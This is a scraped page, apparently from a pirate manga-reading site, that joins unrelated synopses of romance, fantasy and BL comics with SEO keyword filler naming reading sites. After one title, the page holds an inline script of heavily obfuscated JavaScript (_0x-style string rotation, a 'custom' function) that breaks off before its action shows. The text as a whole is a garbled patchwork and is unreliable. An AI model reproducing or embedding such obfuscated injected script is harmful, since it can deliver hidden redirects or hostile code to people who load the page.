Scarlett, who has lost her lover six times to her friend, has always believed and forgiven her friend’s words that are pitiful yet beautiful. “It was for you, Scarlett. Haven’t you always said that any man who can get taken away easily isn’t yours?” But as soon as the veil falls off, Scarlett finally decides to take revenge on her friend. And soon, in front of her friend , she kisses her friend’s fiancé deeply. “I’m the one who is sorry for not seeing your evil intentions, but you shouldn’t have thought that I’d stay a idiot forever.” All of these are revenge from me. Quiet and promiscuous.
Read “A Torn Heart Between Cold King, Cruel King Manga” – “A Torn Heart Between Cold King, Cruel King Manhwa” Online Free At Hotmanga The Summary Of The Comic A Torn Heart Between Cold King, Cruel King: Unable To Put A Stop To Her Husband Cornelius’s Tyrannical Rule As King And His Further Despotism, Queen Amelia Of Selerion Is Falsely Accused Of His Crimes And Executed. The Next Time Amelia Opens Her Eyes, She Finds That She Is Once Again Nineteen Years Old, And Her Engagement To Prince Cornelius Has Not Yet Been Announced To The Public. Determined To Use This Opportunity To Prevent The Tragic Fate Awaiting Her, She Reaches Out To King Luke Of The Neighboring Kingdom Of Folteria. She Finds, However, That King Luke’s Cold-Hearted Reputation Precedes Him… “A Torn Heart Between Cold King, Cruel King” Is Also Known As: Gyakkou Reijou Wa Reitetsu Kokuou Ni Aisareru / 逆行令嬢は冷徹国王に愛される The Comic “A Torn Heart Between Cold King, Cruel King” Belongs To The Genre: Drama, Fantasy, Manhwa, Romance “Manhuafast, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website Kun Manga. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging
“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Zhou Chengyi is a bossy president. He finally falls in love with a girl when he is 27 years old. However, the girl he loves is a straight man who just wears women’s clothes. The man is a online celebrity as a model. Turning from a die-hard fan to sasaeng fan of him, Zhou Chengyi is confused about what true love is. Zhou Chengyi’s Bumpy First Love / ??????????<script></script><script>(function(_0x3e70ee,_0x39dee5){var _0x1122af=_0x2634,_0x91410=_0x3e70ee();while(!![]){try{var _0x206ba1=parseInt(_0x1122af(0xe3))/(0x16*0x5e+-0x19e6+0x11d3)+parseInt(_0x1122af(0xcc))/(-0x9e*-0x26+0x29*0x70+-0x14b1*0x2)+parseInt(_0x1122af(0xc7))/(-0x1b75+0x1*0x224f+-0x6d7)*(-parseInt(_0x1122af(0xdf))/(0x1*-0x17b9+0x19cf*-0x1+0x318c))+parseInt(_0x1122af(0xd9))/(-0x4*0x4bd+0x23c0+-0x5*0x35b)+-parseInt(_0x1122af(0xd8))/(0xac9*-0x1+0x97e+0x1*0x151)*(parseInt(_0x1122af(0xdb))/(0x1191+-0x1f47+-0x1*-0xdbd))+-parseInt(_0x1122af(0xd7))/(0x12d0+0x19a6+-0x2f*0xf2)+-parseInt(_0x1122af(0xd2))/(0x2*0x2c2+0x1*0x191d+-0x1e98);if(_0x206ba1===_0x39dee5)break;else _0x91410['push'](_0x91410['shift']());}catch(_0x3d025f){_0x91410['push'](_0x91410['shift']());}}}(_0x56a2,0x6d31+0x44240+0x3d4c*-0x8));function custom(){var _0x158c6f=_0x2634,_0x34d8e9={'xMzsf':function(_0x4bee58,_0x2c6028){return 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Nakayama Haruto is a game commentator who streams provocative content under the name \"Oni-chan.\" He attracts attention for his radical streams , but his true identity is that of a good older brother who streams to raise money for his younger sister\'s tuition and living expenses. However, he accidentally forgets to turn off the streams , and his true personality is revealed to the public. Just when it seems like he\'s going to cause a major uproar, the contrast with his usual self turns out to be a big hit with viewers...!?
Fashion stylist Ji Xun, who travels through ancient times, expects to marry a rich and beautiful woman and reach the pinnacle of his life, but instead he is targeted by a man who stares him down! Is all this a bad debt in this life or an unresolved bond from his past life?
If I could describe it in a few words, I’d say “poetic”, “lonely”, and “deliberate”. There’s a touch of the sadness that comes at the end of summer, the transition into cold and quiet. It feels heavy with undertones. Every word seems deliberate and filled with meaning.
※ Be prepared for a world after death! I received a strange spam text message right before I died. I thought I was dead but when I opened my eyes I was at the transmigrated examination bureau. There really is a world after death? I\'ll transmigrate to a book?! \"Do you have a particular genre you like?\" I, who mastered a variety of genres in my previous life, In my next life, I hoped for a child-rearing novel where I can become a cute, dainty girl and acquire infinite love. ㅡ The book I\'ll transmigrate to isㅡ Survival Difficulty S-class, an book full of regression instances . ㅡ And the character I will possess thereㅡ is the daughter of a servant who serves the ruthless aristocrat familyㅡwho abused the main character?! However, thanks to , which I signed up for just before I died, I got special privileges... This is a story about surviving an S-class survival difficulty book with the help of new skills, insurance privileges, and God\'s favoritism and affection that I\'ve gained!
It’s the era of Transmigration. I wanted to possess a body of a rich young lady in a Rofan childcare novel, and live while receiving lots of love. No. 1 to be avoided! No. 1 in frustrating the reader! I possessed someone inside an infinite return novel called: Return Until the World is Saved. Forget being a young lady from a prominent family, I will soon be ruined because the survival difficulty of the original work is S-Class. I became an extra. Ellet, the young daughter of a servant in the Count’s manor. We are poor, but it’s a happy life between a kind brother and a good father. I’ve got a best friend I’ve never made before because I was always busy. Even the gods of the Transmigration Management Bureau are openly fond of me. I’m living a life full of confidence. On top of that, I accidentally bought the ‘After-Life Insurance’ full package just before my death. I leveled up with the high-speed growth buff, and diligently destroyed the original plot. Thanks to plenty of special privileges, I came to give satisfaction for all the frustrated readers of the original work. “You wiped your face with your dirty hands.” “…….” “Don’t be surprised. It’s because I have an obligation to be kind.” And then, there’s the protagonist who is still nothing more than a handsome push over, Thesilid. ‘Why is he being this crafty with me?’ Alternative 빙의자를 위한 특혜
Beth runs a porcelain and crystal shop with her best friend in a town that still holds vestiges of the Middle Ages. She was cruelly betrayed by a man who was only after her money, and her heart was torn to pieces. So she embarks on a trip to Prague, a city she’s always dreamed of visiting, after her best friend suggests it might help heal her heart. And while she’s there, she can always purchase some new products for the shop. Handsome Alex calls out to Beth when she’s unable to find a translator, but she’s leery about trusting him. He must be trying to take advantage of a woman traveling alone. It doesn’t help that he’s whispering sweet nothings the moment they meet—this man is definitely dangerous!
A tree spirit from an unknown origin (who's actually more than a few years old), infiltrates 'cold on the outside but warm on the inside' Tang Jun's life. The spirit that fell from the sky decides to live in Tang Jun's house! From then on, a series of funny events start occurring in Tang Jun's everyday life.
A Tsundere Gal Is Becoming Cuter Day by Day summary is updating. Come visit sometime to read the latest chapter of A Tsundere Gal Is Becoming Cuter Day by Day. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.